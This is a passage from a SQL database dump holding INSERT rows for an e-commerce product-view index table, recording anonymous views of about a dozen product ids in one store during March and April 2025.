(16220, NULL, NULL, 2058, 1, '2025-03-27 16:08:29'),
(16221, NULL, NULL, 2064, 1, '2025-03-27 22:19:26'),
(16222, NULL, NULL, 2064, 1, '2025-03-28 02:30:04'),
(16223, NULL, NULL, 2064, 1, '2025-03-28 02:30:04'),
(16224, NULL, NULL, 2064, 1, '2025-03-28 02:30:04'),
(16225, NULL, NULL, 2061, 1, '2025-03-28 02:30:21'),
(16226, NULL, NULL, 2062, 1, '2025-03-28 02:30:30'),
(16227, NULL, NULL, 2063, 1, '2025-03-28 02:30:31'),
(16228, NULL, NULL, 2059, 1, '2025-03-28 02:30:33'),
(16229, NULL, NULL, 2058, 1, '2025-03-28 02:30:34'),
(16230, NULL, NULL, 2055, 1, '2025-03-28 02:30:40'),
(16231, NULL, NULL, 2060, 1, '2025-03-28 02:30:43'),
(16232, NULL, NULL, 2054, 1, '2025-03-28 02:30:44'),
(16233, NULL, NULL, 2053, 1, '2025-03-28 02:31:01'),
(16234, NULL, NULL, 2063, 1, '2025-03-28 06:52:59'),
(16235, NULL, NULL, 2061, 1, '2025-03-28 07:01:50'),
(16236, NULL, NULL, 2062, 1, '2025-03-28 15:21:00'),
(16237, NULL, NULL, 2064, 1, '2025-03-28 15:37:47'),
(16238, NULL, NULL, 2063, 1, '2025-03-28 15:37:51'),
(16239, NULL, NULL, 2062, 1, '2025-03-28 15:37:59'),
(16240, NULL, NULL, 2061, 1, '2025-03-28 15:38:03'),
(16241, NULL, NULL, 2060, 1, '2025-03-28 15:38:07'),
(16242, NULL, NULL, 2059, 1, '2025-03-28 15:38:11'),
(16243, NULL, NULL, 2058, 1, '2025-03-28 15:38:15'),
(16244, NULL, NULL, 2055, 1, '2025-03-28 15:38:18'),
(16245, NULL, NULL, 2054, 1, '2025-03-28 15:38:25'),
(16246, NULL, NULL, 2061, 1, '2025-03-28 19:57:52'),
(16247, NULL, NULL, 2064, 1, '2025-03-28 20:42:50'),
(16248, NULL, NULL, 2061, 1, '2025-03-28 21:42:37'),
(16249, NULL, NULL, 2061, 1, '2025-03-28 22:19:29'),
(16250, NULL, NULL, 2059, 1, '2025-03-28 22:36:32'),
(16251, NULL, NULL, 2054, 1, '2025-03-28 22:38:38'),
(16252, NULL, NULL, 2060, 1, '2025-03-28 22:39:21'),
(16253, NULL, NULL, 2061, 1, '2025-03-28 22:39:32'),
(16254, NULL, NULL, 2063, 1, '2025-03-28 22:41:09'),
(16255, NULL, NULL, 2062, 1, '2025-03-29 02:24:16'),
(16256, NULL, NULL, 2059, 1, '2025-03-29 02:24:28'),
(16257, NULL, NULL, 2061, 1, '2025-03-29 02:24:32'),
(16258, NULL, NULL, 2063, 1, '2025-03-29 02:24:40'),
(16259, NULL, NULL, 2059, 1, '2025-03-29 03:27:01'),
(16260, NULL, NULL, 2061, 1, '2025-03-29 13:06:56'),
(16261, NULL, NULL, 2061, 1, '2025-03-29 13:45:29'),
(16262, NULL, NULL, 2062, 1, '2025-03-29 15:43:34'),
(16263, NULL, NULL, 2054, 1, '2025-03-29 18:31:55'),
(16264, NULL, NULL, 2058, 1, '2025-03-29 18:32:01'),
(16265, NULL, NULL, 2055, 1, '2025-03-29 18:32:11'),
(16266, NULL, NULL, 2060, 1, '2025-03-29 18:32:14'),
(16267, NULL, NULL, 2062, 1, '2025-03-29 18:32:22'),
(16268, NULL, NULL, 2061, 1, '2025-03-29 18:32:24'),
(16269, NULL, NULL, 2063, 1, '2025-03-29 18:32:26'),
(16270, NULL, NULL, 2059, 1, '2025-03-29 18:32:28'),
(16271, NULL, NULL, 2064, 1, '2025-03-29 18:32:47'),
(16272, NULL, NULL, 2063, 1, '2025-03-29 22:13:24'),
(16273, NULL, NULL, 2054, 1, '2025-03-30 02:01:29'),
(16274, NULL, NULL, 2062, 1, '2025-03-30 03:37:59'),
(16275, NULL, NULL, 2055, 1, '2025-03-30 05:24:39'),
(16276, NULL, NULL, 2060, 1, '2025-03-30 05:28:11'),
(16277, NULL, NULL, 2054, 1, '2025-03-30 07:00:27'),
(16278, NULL, NULL, 2054, 1, '2025-03-30 07:00:28'),
(16279, NULL, NULL, 2054, 1, '2025-03-30 07:39:47'),
(16280, NULL, NULL, 2054, 1, '2025-03-30 07:39:48'),
(16281, NULL, NULL, 2054, 1, '2025-03-30 07:43:19'),
(16282, NULL, NULL, 2054, 1, '2025-03-30 07:43:20'),
(16283, NULL, NULL, 2054, 1, '2025-03-30 07:44:48'),
(16284, NULL, NULL, 2054, 1, '2025-03-30 07:44:49'),
(16285, NULL, NULL, 2054, 1, '2025-03-30 07:47:53'),
(16286, NULL, NULL, 2054, 1, '2025-03-30 07:47:55'),
(16287, NULL, NULL, 2054, 1, '2025-03-30 07:49:27'),
(16288, NULL, NULL, 2054, 1, '2025-03-30 07:49:28'),
(16289, NULL, NULL, 2054, 1, '2025-03-30 07:51:15'),
(16290, NULL, NULL, 2054, 1, '2025-03-30 07:51:16'),
(16291, NULL, NULL, 2054, 1, '2025-03-30 07:52:43'),
(16292, NULL, NULL, 2054, 1, '2025-03-30 07:52:44'),
(16293, NULL, NULL, 2054, 1, '2025-03-30 07:54:43'),
(16294, NULL, NULL, 2054, 1, '2025-03-30 07:54:44'),
(16295, NULL, NULL, 2054, 1, '2025-03-30 07:58:49'),
(16296, NULL, NULL, 2054, 1, '2025-03-30 07:58:50'),
(16297, NULL, NULL, 2055, 1, '2025-03-30 10:11:40'),
(16298, NULL, NULL, 2059, 1, '2025-03-30 11:22:41'),
(16299, NULL, NULL, 2054, 1, '2025-03-30 13:40:09'),
(16300, NULL, NULL, 2054, 1, '2025-03-30 13:48:24'),
(16301, NULL, NULL, 2062, 1, '2025-03-30 15:41:27'),
(16302, NULL, NULL, 2064, 1, '2025-03-30 16:58:21'),
(16303, NULL, NULL, 2060, 1, '2025-03-30 21:51:06'),
(16304, NULL, NULL, 2060, 1, '2025-03-30 22:24:05'),
(16305, NULL, NULL, 2059, 1, '2025-03-30 22:25:33'),
(16306, NULL, NULL, 2054, 1, '2025-03-30 23:23:18'),
(16307, NULL, NULL, 2061, 1, '2025-03-30 23:23:23'),
(16308, NULL, NULL, 2063, 1, '2025-03-30 23:24:13'),
(16309, NULL, NULL, 2061, 1, '2025-03-31 02:55:18'),
(16310, NULL, NULL, 2063, 1, '2025-03-31 06:46:57'),
(16311, NULL, NULL, 2058, 1, '2025-03-31 06:46:59'),
(16312, NULL, NULL, 2054, 1, '2025-03-31 07:24:16'),
(16313, NULL, NULL, 2062, 1, '2025-03-31 08:27:51'),
(16314, NULL, NULL, 2055, 1, '2025-03-31 11:27:07'),
(16315, NULL, NULL, 2064, 1, '2025-03-31 12:29:30'),
(16316, NULL, NULL, 2062, 1, '2025-03-31 15:33:17'),
(16317, NULL, NULL, 2053, 1, '2025-03-31 21:23:27'),
(16318, NULL, NULL, 2062, 1, '2025-03-31 22:19:10'),
(16319, NULL, NULL, 2061, 1, '2025-03-31 22:56:48'),
(16320, NULL, NULL, 2062, 1, '2025-04-01 01:22:28'),
(16321, NULL, NULL, 2061, 1, '2025-04-01 02:54:16'),
(16322, NULL, NULL, 2063, 1, '2025-04-01 04:25:00'),
(16323, NULL, NULL, 2064, 1, '2025-04-01 07:12:25'),
(16324, NULL, NULL, 2059, 1, '2025-04-01 07:12:25'),
(16325, NULL, NULL, 2060, 1, '2025-04-01 07:12:25'),
(16326, NULL, NULL, 2064, 1, '2025-04-01 07:12:46'),
(16327, NULL, NULL, 2064, 1, '2025-04-01 07:12:47'),
(16328, NULL, NULL, 2058, 1, '2025-04-01 07:12:54'),
(16329, NULL, NULL, 2063, 1, '2025-04-01 07:12:55'),
(16330, NULL, NULL, 2062, 1, '2025-04-01 07:12:56'),
(16331, NULL, NULL, 2061, 1, '2025-04-01 07:12:58'),
(16332, NULL, NULL, 2055, 1, '2025-04-01 07:13:04'),
(16333, NULL, NULL, 2054, 1, '2025-04-01 07:13:07'),
(16334, NULL, NULL, 2060, 1, '2025-04-01 10:08:14'),
(16335, NULL, NULL, 2064, 1, '2025-04-01 10:08:16'),
(16336, NULL, NULL, 2059, 1, '2025-04-01 10:08:17'),
(16337, NULL, NULL, 2064, 1, '2025-04-01 10:08:35'),
(16338, NULL, NULL, 2064, 1, '2025-04-01 10:08:36'),
(16339, NULL, NULL, 2061, 1, '2025-04-01 10:08:44'),
(16340, NULL, NULL, 2058, 1, '2025-04-01 10:08:45'),
(16341, NULL, NULL, 2063, 1, '2025-04-01 10:08:47'),
(16342, NULL, NULL, 2062, 1, '2025-04-01 10:08:47'),
(16343, NULL, NULL, 2055, 1, '2025-04-01 10:08:56'),
(16344, NULL, NULL, 2054, 1, '2025-04-01 10:08:57'),
(16345, NULL, NULL, 2061, 1, '2025-04-01 13:55:36'),
(16346, NULL, NULL, 2058, 1, '2025-04-01 13:59:57'),
(16347, NULL, NULL, 2055, 1, '2025-04-01 14:05:47'),
(16348, NULL, NULL, 2061, 1, '2025-04-01 14:49:46'),
(16349, NULL, NULL, 2062, 1, '2025-04-01 15:47:26'),
(16350, NULL, NULL, 2062, 1, '2025-04-01 16:26:52'),
(16351, NULL, NULL, 2060, 1, '2025-04-01 17:26:52'),
(16352, NULL, NULL, 2064, 1, '2025-04-01 18:23:03'),
(16353, NULL, NULL, 2064, 1, '2025-04-01 18:34:30'),
(16354, NULL, NULL, 2058, 1, '2025-04-01 22:12:08'),
(16355, NULL, NULL, 2053, 1, '2025-04-01 22:13:46'),
(16356, NULL, NULL, 2054, 1, '2025-04-01 22:53:37'),
(16357, NULL, NULL, 2064, 1, '2025-04-02 00:10:57'),
(16358, NULL, NULL, 2063, 1, '2025-04-02 02:08:07'),
(16359, NULL, NULL, 2059, 1, '2025-04-02 02:13:16'),
(16360, NULL, NULL, 2060, 1, '2025-04-02 06:33:06'),
(16361, NULL, NULL, 2059, 1, '2025-04-02 06:34:12'),
(16362, NULL, NULL, 2054, 1, '2025-04-02 06:34:59'),
(16363, NULL, NULL, 2061, 1, '2025-04-02 06:35:13'),
(16364, NULL, NULL, 2063, 1, '2025-04-02 06:41:28'),
(16365, NULL, NULL, 2054, 1, '2025-04-02 10:47:30'),
(16366, NULL, NULL, 2062, 1, '2025-04-02 10:59:50'),
(16367, NULL, NULL, 2060, 1, '2025-04-02 11:09:41'),
(16368, NULL, NULL, 2062, 1, '2025-04-02 15:47:06'),
(16369, NULL, NULL, 2054, 1, '2025-04-02 20:15:41'),
(16370, NULL, NULL, 2059, 1, '2025-04-03 08:16:51'),
(16371, NULL, NULL, 2053, 1, '2025-04-03 08:27:54'),
(16372, NULL, NULL, 2061, 1, '2025-04-03 09:45:03'),
(16373, NULL, NULL, 2058, 1, '2025-04-03 11:02:01'),
(16374, NULL, NULL, 2061, 1, '2025-04-03 11:02:34'),
(16375, NULL, NULL, 2059, 1, '2025-04-03 11:02:57'),
(16376, NULL, NULL, 2060, 1, '2025-04-03 11:03:13'),
(16377, NULL, NULL, 2062, 1, '2025-04-03 11:03:35'),
(16378, NULL, NULL, 2063, 1, '2025-04-03 11:03:51'),
(16379, NULL, NULL, 2064, 1, '2025-04-03 11:04:06'),
(16380, NULL, NULL, 2055, 1, '2025-04-03 11:06:07'),
(16381, NULL, NULL, 2054, 1, '2025-04-03 11:06:19'),
(16382, NULL, NULL, 2053, 1, '2025-04-03 11:06:28'),
(16383, NULL, NULL, 2058, 1, '2025-04-03 11:58:19'),
(16384, NULL, NULL, 2061, 1, '2025-04-03 11:58:31'),
(16385, NULL, NULL, 2059, 1, '2025-04-03 11:58:48'),
(16386, NULL, NULL, 2060, 1, '2025-04-03 11:58:59'),
(16387, NULL, NULL, 2062, 1, '2025-04-03 11:59:12'),
(16388, NULL, NULL, 2063, 1, '2025-04-03 11:59:24'),
(16389, NULL, NULL, 2064, 1, '2025-04-03 11:59:36'),
(16390, NULL, NULL, 2055, 1, '2025-04-03 12:01:26'),
(16391, NULL, NULL, 2054, 1, '2025-04-03 12:01:37'),
(16392, NULL, NULL, 2053, 1, '2025-04-03 12:01:50'),
(16393, NULL, NULL, 2062, 1, '2025-04-03 15:36:41'),
(16394, NULL, NULL, 2058, 1, '2025-04-03 18:02:49'),
(16395, NULL, NULL, 2054, 1, '2025-04-03 19:43:38'),
(16396, NULL, NULL, 2060, 1, '2025-04-03 19:43:41'),
(16397, NULL, NULL, 2061, 1, '2025-04-04 01:13:12'),
(16398, NULL, NULL, 2059, 1, '2025-04-04 02:30:20'),
(16399, NULL, NULL, 2060, 1, '2025-04-04 03:03:11'),
(16400, NULL, NULL, 2060, 1, '2025-04-04 06:43:08'),
(16401, NULL, NULL, 2059, 1, '2025-04-04 06:43:47'),
(16402, NULL, NULL, 2054, 1, '2025-04-04 06:45:10'),
(16403, NULL, NULL, 2061, 1, '2025-04-04 06:45:15'),
(16404, NULL, NULL, 2064, 1, '2025-04-04 06:45:39'),
(16405, NULL, NULL, 2063, 1, '2025-04-04 06:52:49'),
(16406, NULL, NULL, 2058, 1, '2025-04-04 15:27:49'),
(16407, NULL, NULL, 2062, 1, '2025-04-04 15:38:54'),
(16408, NULL, NULL, 2058, 1, '2025-04-04 17:54:15'),
(16409, NULL, NULL, 2058, 1, '2025-04-04 20:36:29'),
(16410, NULL, NULL, 2062, 1, '2025-04-04 21:07:08'),
(16411, NULL, NULL, 2055, 1, '2025-04-05 03:43:21'),
(16412, NULL, NULL, 2064, 1, '2025-04-05 03:43:24'),
(16413, NULL, NULL, 2063, 1, '2025-04-05 03:43:26'),
(16414, NULL, NULL, 2062, 1, '2025-04-05 03:43:27'),
(16415, NULL, NULL, 2060, 1, '2025-04-05 03:43:29'),
(16416, NULL, NULL, 2054, 1, '2025-04-05 06:29:03'),
(16417, NULL, NULL, 2062, 1, '2025-04-05 08:57:56'),
(16418, NULL, NULL, 2058, 1, '2025-04-05 12:30:24'),
(16419, NULL, NULL, 2055, 1, '2025-04-05 12:33:00'),
(16420, NULL, NULL, 2064, 1, '2025-04-05 12:33:00'),
(16421, NULL, NULL, 2064, 1, '2025-04-05 12:33:00'),
(16422, NULL, NULL, 2054, 1, '2025-04-05 12:33:00'),
(16423, NULL, NULL, 2059, 1, '2025-04-05 12:33:00'),
(16424, NULL, NULL, 2064, 1, '2025-04-05 12:33:22'),
(16425, NULL, NULL, 2061, 1, '2025-04-05 12:33:30'),
(16426, NULL, NULL, 2058, 1, '2025-04-05 12:33:31'),
(16427, NULL, NULL, 2063, 1, '2025-04-05 12:33:33'),
(16428, NULL, NULL, 2062, 1, '2025-04-05 12:33:34'),
(16429, NULL, NULL, 2060, 1, '2025-04-05 12:33:42'),
(16430, NULL, NULL, 2053, 1, '2025-04-05 12:33:52'),
(16431, NULL, NULL, 2062, 1, '2025-04-05 15:33:23'),
(16432, NULL, NULL, 2061, 1, '2025-04-05 17:01:31'),
(16433, NULL, NULL, 2058, 1, '2025-04-05 17:12:03'),
(16434, NULL, NULL, 2061, 1, '2025-04-05 18:05:08'),
(16435, NULL, NULL, 2055, 1, '2025-04-06 05:34:38'),
(16436, NULL, NULL, 2055, 1, '2025-04-06 06:27:50'),
(16437, NULL, NULL, 2060, 1, '2025-04-06 13:48:07'),
(16438, NULL, NULL, 2059, 1, '2025-04-06 13:49:25'),
(16439, NULL, NULL, 2054, 1, '2025-04-06 13:50:10'),
(16440, NULL, NULL, 2061, 1, '2025-04-06 13:51:10'),
(16441, NULL, NULL, 2063, 1, '2025-04-06 13:58:07'),
(16442, NULL, NULL, 2055, 1, '2025-04-06 14:08:53'),
(16443, NULL, NULL, 2062, 1, '2025-04-06 15:38:52'),
(16444, NULL, NULL, 2054, 1, '2025-04-06 22:41:36'),
(16445, NULL, NULL, 2064, 1, '2025-04-06 23:34:36'),
(16446, NULL, NULL, 2064, 1, '2025-04-06 23:57:41'),
(16447, NULL, NULL, 2062, 1, '2025-04-07 00:03:08'),
(16448, NULL, NULL, 2059, 1, '2025-04-07 00:29:46'),
(16449, NULL, NULL, 2064, 1, '2025-04-07 07:03:36'),
(16450, NULL, NULL, 2063, 1, '2025-04-07 07:36:01'),
(16451, NULL, NULL, 2059, 1, '2025-04-07 07:49:56'),
(16452, NULL, NULL, 2064, 1, '2025-04-07 08:13:45'),
(16453, NULL, NULL, 2060, 1, '2025-04-07 08:18:32'),
(16454, NULL, NULL, 2060, 1, '2025-04-07 09:19:58'),
(16455, NULL, NULL, 2061, 1, '2025-04-07 10:48:39'),
(16456, NULL, NULL, 2064, 1, '2025-04-07 12:32:18'),
(16457, NULL, NULL, 2059, 1, '2025-04-07 13:22:15'),
(16458, NULL, NULL, 2059, 1, '2025-04-07 13:47:34'),
(16459, NULL, NULL, 2062, 1, '2025-04-07 14:41:33'),
(16460, NULL, NULL, 2062, 1, '2025-04-07 20:28:07'),
(16461, NULL, NULL, 2053, 1, '2025-04-08 01:53:00'),
(16462, NULL, NULL, 2060, 1, '2025-04-08 07:27:05'),
(16463, NULL, NULL, 2054, 1, '2025-04-08 09:19:57'),
(16464, NULL, NULL, 2055, 1, '2025-04-08 09:20:00'),
(16465, NULL, NULL, 2064, 1, '2025-04-08 09:20:15'),
(16466, NULL, NULL, 2063, 1, '2025-04-08 09:20:30'),
(16467, NULL, NULL, 2062, 1, '2025-04-08 09:20:34'),
(16468, NULL, NULL, 2060, 1, '2025-04-08 09:20:36'),
(16469, NULL, NULL, 2059, 1, '2025-04-08 09:20:38'),
(16470, NULL, NULL, 2061, 1, '2025-04-08 09:20:40'),
(16471, NULL, NULL, 2058, 1, '2025-04-08 09:20:42'),
(16472, NULL, NULL, 2054, 1, '2025-04-08 13:15:00'),
(16473, NULL, NULL, 2060, 1, '2025-04-08 14:57:24'),
(16474, NULL, NULL, 2059, 1, '2025-04-08 15:08:30'),
(16475, NULL, NULL, 2061, 1, '2025-04-08 15:09:20'),
(16476, NULL, NULL, 2063, 1, '2025-04-08 15:15:59'),
(16477, NULL, NULL, 2062, 1, '2025-04-08 15:53:18'),
(16478, NULL, NULL, 2059, 1, '2025-04-09 01:36:08'),
(16479, NULL, NULL, 2055, 1, '2025-04-09 01:47:59'),
(16480, NULL, NULL, 2064, 1, '2025-04-09 02:25:37'),
(16481, NULL, NULL, 2058, 1, '2025-04-09 03:54:05'),
(16482, NULL, NULL, 2064, 1, '2025-04-09 04:24:59'),
(16483, NULL, NULL, 2055, 1, '2025-04-09 07:32:29'),
(16484, NULL, NULL, 2053, 1, '2025-04-09 07:36:15'),
(16485, NULL, NULL, 2060, 1, '2025-04-09 09:43:47'),
(16486, NULL, NULL, 2063, 1, '2025-04-09 09:53:31'),
(16487, NULL, NULL, 2061, 1, '2025-04-09 10:04:50'),
(16488, NULL, NULL, 2062, 1, '2025-04-09 10:25:16'),
(16489, NULL, NULL, 2054, 1, '2025-04-09 10:34:11'),
(16490, NULL, NULL, 2063, 1, '2025-04-09 10:55:37'),
(16491, NULL, NULL, 2064, 1, '2025-04-09 13:57:07'),
(16492, NULL, NULL, 2062, 1, '2025-04-09 15:38:24'),
(16493, NULL, NULL, 2063, 1, '2025-04-09 17:32:05'),
(16494, NULL, NULL, 2063, 1, '2025-04-09 19:36:18'),
(16495, NULL, NULL, 2053, 1, '2025-04-09 20:39:16'),
(16496, NULL, NULL, 2059, 1, '2025-04-09 22:18:38'),
(16497, NULL, NULL, 2064, 1, '2025-04-09 22:18:39'),
(16498, NULL, NULL, 2064, 1, '2025-04-09 22:18:39'),
(16499, NULL, NULL, 2061, 1, '2025-04-09 22:18:39'),
(16500, NULL, NULL, 2058, 1, '2025-04-09 22:18:39'),
(16501, NULL, NULL, 2064, 1, '2025-04-09 22:18:40');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(16502, NULL, NULL, 2060, 1, '2025-04-09 22:19:19'),
(16503, NULL, NULL, 2054, 1, '2025-04-09 22:19:20'),
(16504, NULL, NULL, 2053, 1, '2025-04-09 22:19:21'),
(16505, NULL, NULL, 2062, 1, '2025-04-09 22:19:23'),
(16506, NULL, NULL, 2063, 1, '2025-04-09 22:19:24'),
(16507, NULL, NULL, 2055, 1, '2025-04-09 22:19:26'),
(16508, NULL, NULL, 2064, 1, '2025-04-09 23:12:17'),
(16509, NULL, NULL, 2061, 1, '2025-04-09 23:57:19'),
(16510, NULL, NULL, 2058, 1, '2025-04-09 23:57:23'),
(16511, NULL, NULL, 2059, 1, '2025-04-09 23:57:26'),
(16512, NULL, NULL, 2063, 1, '2025-04-09 23:57:29'),
(16513, NULL, NULL, 2064, 1, '2025-04-09 23:57:33'),
(16514, NULL, NULL, 2055, 1, '2025-04-09 23:57:41'),
(16515, NULL, NULL, 2054, 1, '2025-04-09 23:57:48'),
(16516, NULL, NULL, 2064, 1, '2025-04-09 23:58:28'),
(16517, NULL, NULL, 2064, 1, '2025-04-09 23:58:31'),
(16518, NULL, NULL, 2062, 1, '2025-04-09 23:58:36'),
(16519, NULL, NULL, 2060, 1, '2025-04-09 23:58:49'),
(16520, NULL, NULL, 2060, 1, '2025-04-10 00:08:32'),
(16521, NULL, NULL, 2058, 1, '2025-04-10 03:23:16'),
(16522, NULL, NULL, 2059, 1, '2025-04-10 15:13:15'),
(16523, NULL, NULL, 2062, 1, '2025-04-10 16:04:53'),
(16524, NULL, NULL, 2061, 1, '2025-04-10 18:06:46'),
(16525, NULL, NULL, 2063, 1, '2025-04-10 18:13:33'),
(16526, NULL, NULL, 2061, 1, '2025-04-11 06:22:31'),
(16527, NULL, NULL, 2058, 1, '2025-04-11 06:33:51'),
(16528, NULL, NULL, 2055, 1, '2025-04-11 06:41:19'),
(16529, NULL, NULL, 2053, 1, '2025-04-11 07:13:07'),
(16530, NULL, NULL, 2055, 1, '2025-04-11 07:40:30'),
(16531, NULL, NULL, 2062, 1, '2025-04-11 15:51:10'),
(16532, NULL, NULL, 2061, 1, '2025-04-11 16:18:59'),
(16533, NULL, NULL, 2062, 1, '2025-04-11 16:35:18'),
(16534, NULL, NULL, 2064, 1, '2025-04-11 17:45:39'),
(16535, NULL, NULL, 2064, 1, '2025-04-11 17:58:39'),
(16536, NULL, NULL, 2060, 1, '2025-04-11 18:09:03'),
(16537, NULL, NULL, 2060, 1, '2025-04-11 18:14:12'),
(16538, NULL, NULL, 2062, 1, '2025-04-11 19:33:59'),
(16539, NULL, NULL, 2061, 1, '2025-04-11 19:38:04'),
(16540, NULL, NULL, 2058, 1, '2025-04-11 20:09:12'),
(16541, NULL, NULL, 2058, 1, '2025-04-12 00:10:09'),
(16542, NULL, NULL, 2063, 1, '2025-04-12 03:09:13'),
(16543, NULL, NULL, 2054, 1, '2025-04-12 03:34:06'),
(16544, NULL, NULL, 2063, 1, '2025-04-12 05:13:34'),
(16545, NULL, NULL, 2059, 1, '2025-04-12 05:19:48'),
(16546, NULL, NULL, 2054, 1, '2025-04-12 09:08:00'),
(16547, NULL, NULL, 2064, 1, '2025-04-12 09:30:58'),
(16548, NULL, NULL, 2063, 1, '2025-04-12 10:27:55'),
(16549, NULL, NULL, 2055, 1, '2025-04-12 14:00:10'),
(16550, NULL, NULL, 2062, 1, '2025-04-12 15:36:05'),
(16551, NULL, NULL, 2059, 1, '2025-04-13 01:44:51'),
(16552, NULL, NULL, 2062, 1, '2025-04-13 13:11:35'),
(16553, NULL, NULL, 2055, 1, '2025-04-13 14:25:12'),
(16554, NULL, NULL, 2062, 1, '2025-04-13 15:28:15'),
(16555, NULL, NULL, 2062, 1, '2025-04-14 00:29:48'),
(16556, NULL, NULL, 2059, 1, '2025-04-14 00:56:38'),
(16557, NULL, NULL, 2063, 1, '2025-04-14 07:32:41'),
(16558, NULL, NULL, 2054, 1, '2025-04-14 12:50:21'),
(16559, NULL, NULL, 2062, 1, '2025-04-14 15:30:19'),
(16560, NULL, NULL, 2053, 1, '2025-04-14 20:10:46'),
(16561, NULL, NULL, 2060, 1, '2025-04-14 20:10:49'),
(16562, NULL, NULL, 2064, 1, '2025-04-14 20:10:57'),
(16563, NULL, NULL, 2058, 1, '2025-04-14 20:11:09'),
(16564, NULL, NULL, 2059, 1, '2025-04-14 20:11:13'),
(16565, NULL, NULL, 2055, 1, '2025-04-14 20:11:21'),
(16566, NULL, NULL, 2061, 1, '2025-04-14 23:11:26'),
(16567, NULL, NULL, 2054, 1, '2025-04-15 02:33:06'),
(16568, NULL, NULL, 2055, 1, '2025-04-15 02:33:09'),
(16569, NULL, NULL, 2064, 1, '2025-04-15 02:33:19'),
(16570, NULL, NULL, 2063, 1, '2025-04-15 02:33:21'),
(16571, NULL, NULL, 2062, 1, '2025-04-15 02:33:23'),
(16572, NULL, NULL, 2060, 1, '2025-04-15 02:33:26'),
(16573, NULL, NULL, 2059, 1, '2025-04-15 02:33:28'),
(16574, NULL, NULL, 2061, 1, '2025-04-15 02:33:30'),
(16575, NULL, NULL, 2058, 1, '2025-04-15 02:33:32'),
(16576, NULL, NULL, 2064, 1, '2025-04-15 09:59:32'),
(16577, NULL, NULL, 2062, 1, '2025-04-15 09:59:32'),
(16578, NULL, NULL, 2063, 1, '2025-04-15 11:59:20'),
(16579, NULL, NULL, 2062, 1, '2025-04-15 15:20:05'),
(16580, NULL, NULL, 2059, 1, '2025-04-15 20:15:26'),
(16581, NULL, NULL, 2064, 1, '2025-04-15 20:18:17'),
(16582, NULL, NULL, 2058, 1, '2025-04-15 23:12:39'),
(16583, NULL, NULL, 2061, 1, '2025-04-16 00:53:12'),
(16584, NULL, NULL, 2058, 1, '2025-04-16 01:18:13'),
(16585, NULL, NULL, 2053, 1, '2025-04-16 01:48:34'),
(16586, NULL, NULL, 2058, 1, '2025-04-16 03:01:43'),
(16587, NULL, NULL, 2055, 1, '2025-04-16 03:14:21'),
(16588, NULL, NULL, 2055, 1, '2025-04-16 04:11:52'),
(16589, NULL, NULL, 2060, 1, '2025-04-16 05:16:29'),
(16590, NULL, NULL, 2058, 1, '2025-04-16 07:37:16'),
(16591, NULL, NULL, 2062, 1, '2025-04-16 15:43:27'),
(16592, NULL, NULL, 2059, 1, '2025-04-16 16:02:02'),
(16593, NULL, NULL, 2058, 1, '2025-04-16 17:52:19'),
(16594, NULL, NULL, 2062, 1, '2025-04-16 17:58:19'),
(16595, NULL, NULL, 2064, 1, '2025-04-16 20:32:36'),
(16596, NULL, NULL, 2064, 1, '2025-04-16 20:38:43'),
(16597, NULL, NULL, 2060, 1, '2025-04-16 21:49:15'),
(16598, NULL, NULL, 2054, 1, '2025-04-16 21:57:42'),
(16599, NULL, NULL, 2061, 1, '2025-04-16 23:45:17'),
(16600, NULL, NULL, 2062, 1, '2025-04-17 03:53:49'),
(16601, NULL, NULL, 2063, 1, '2025-04-17 04:11:02'),
(16602, NULL, NULL, 2059, 1, '2025-04-17 04:22:36'),
(16603, NULL, NULL, 2064, 1, '2025-04-17 06:54:55'),
(16604, NULL, NULL, 2055, 1, '2025-04-17 08:38:55'),
(16605, NULL, NULL, 2062, 1, '2025-04-17 15:34:27'),
(16606, NULL, NULL, 2063, 1, '2025-04-18 01:06:35'),
(16607, NULL, NULL, 2062, 1, '2025-04-18 15:34:17'),
(16608, NULL, NULL, 2061, 1, '2025-04-18 18:41:52'),
(16609, NULL, NULL, 2061, 1, '2025-04-18 21:28:34'),
(16610, NULL, NULL, 2059, 1, '2025-04-18 22:26:06'),
(16611, NULL, NULL, 2062, 1, '2025-04-18 23:55:06'),
(16612, NULL, NULL, 2054, 1, '2025-04-19 03:08:40'),
(16613, NULL, NULL, 2055, 1, '2025-04-19 04:43:55'),
(16614, NULL, NULL, 2063, 1, '2025-04-19 08:44:55'),
(16615, NULL, NULL, 2060, 1, '2025-04-19 12:36:32'),
(16616, NULL, NULL, 2060, 1, '2025-04-19 13:53:39'),
(16617, NULL, NULL, 2062, 1, '2025-04-19 15:43:51'),
(16618, NULL, NULL, 2059, 1, '2025-04-19 15:51:21'),
(16619, NULL, NULL, 2055, 1, '2025-04-19 16:18:36'),
(16620, NULL, NULL, 2054, 1, '2025-04-19 16:59:41'),
(16621, NULL, NULL, 2063, 1, '2025-04-19 18:02:56'),
(16622, NULL, NULL, 2055, 1, '2025-04-19 18:49:59'),
(16623, NULL, NULL, 2054, 1, '2025-04-19 19:28:03'),
(16624, NULL, NULL, 2058, 1, '2025-04-20 00:53:05'),
(16625, NULL, NULL, 2061, 1, '2025-04-20 01:27:07'),
(16626, NULL, NULL, 2064, 1, '2025-04-20 02:27:20'),
(16627, NULL, NULL, 2058, 1, '2025-04-20 07:17:05'),
(16628, NULL, NULL, 2061, 1, '2025-04-20 13:30:33'),
(16629, NULL, NULL, 2059, 1, '2025-04-20 14:17:22'),
(16630, NULL, NULL, 2054, 1, '2025-04-20 15:15:26'),
(16631, NULL, NULL, 2062, 1, '2025-04-20 15:35:05'),
(16632, NULL, NULL, 2064, 1, '2025-04-20 16:00:42'),
(16633, NULL, NULL, 2061, 1, '2025-04-20 18:01:55'),
(16634, NULL, NULL, 2058, 1, '2025-04-20 20:55:00'),
(16635, NULL, NULL, 2058, 1, '2025-04-21 05:17:45'),
(16636, NULL, NULL, 2055, 1, '2025-04-21 05:27:43'),
(16637, NULL, NULL, 2062, 1, '2025-04-21 06:01:01'),
(16638, NULL, NULL, 2058, 1, '2025-04-21 06:18:27'),
(16639, NULL, NULL, 2062, 1, '2025-04-21 07:02:41'),
(16640, NULL, NULL, 2059, 1, '2025-04-21 08:00:26'),
(16641, NULL, NULL, 2059, 1, '2025-04-21 14:00:34'),
(16642, NULL, NULL, 2054, 1, '2025-04-21 15:23:16'),
(16643, NULL, NULL, 2062, 1, '2025-04-21 15:37:02'),
(16644, NULL, NULL, 2064, 1, '2025-04-21 19:30:54'),
(16645, NULL, NULL, 2063, 1, '2025-04-21 21:33:44'),
